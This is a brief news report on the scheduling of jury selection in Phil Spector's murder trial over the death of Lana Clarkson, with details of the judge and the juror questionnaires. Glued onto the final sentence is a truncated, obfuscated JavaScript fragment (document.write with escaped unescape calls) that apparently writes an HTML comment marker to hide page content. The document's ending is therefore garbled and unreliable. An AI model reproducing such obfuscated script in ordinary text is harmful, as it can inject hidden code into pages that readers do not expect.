Jury selection in the trial of Phil Spector will begin in March, it has been announced.
A judge handling the case of the infamous producer ruled yesterday that potential candidates for the trial would be assessed from March 19.
Spector has been free on a million dollars bail since being arrested in the aftermath of the fatal shooting of B-movie star Lana Clarkson in February, 2003.
Los Angeles Superior Court Judge Larry Paul Fidler confirmed that some 300 potential jurors selected for the trial are expected to fill-out a questionnaire assessing their suitability.
It is also expected that Fidler will take the opportunity to question the candidates about their knowledge of the case as he seeks to appoint a jury for the murder trial.
Clarkson was found dead in Spector's Beverly Hills mansion on February 3, 2003. He denies killing her.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
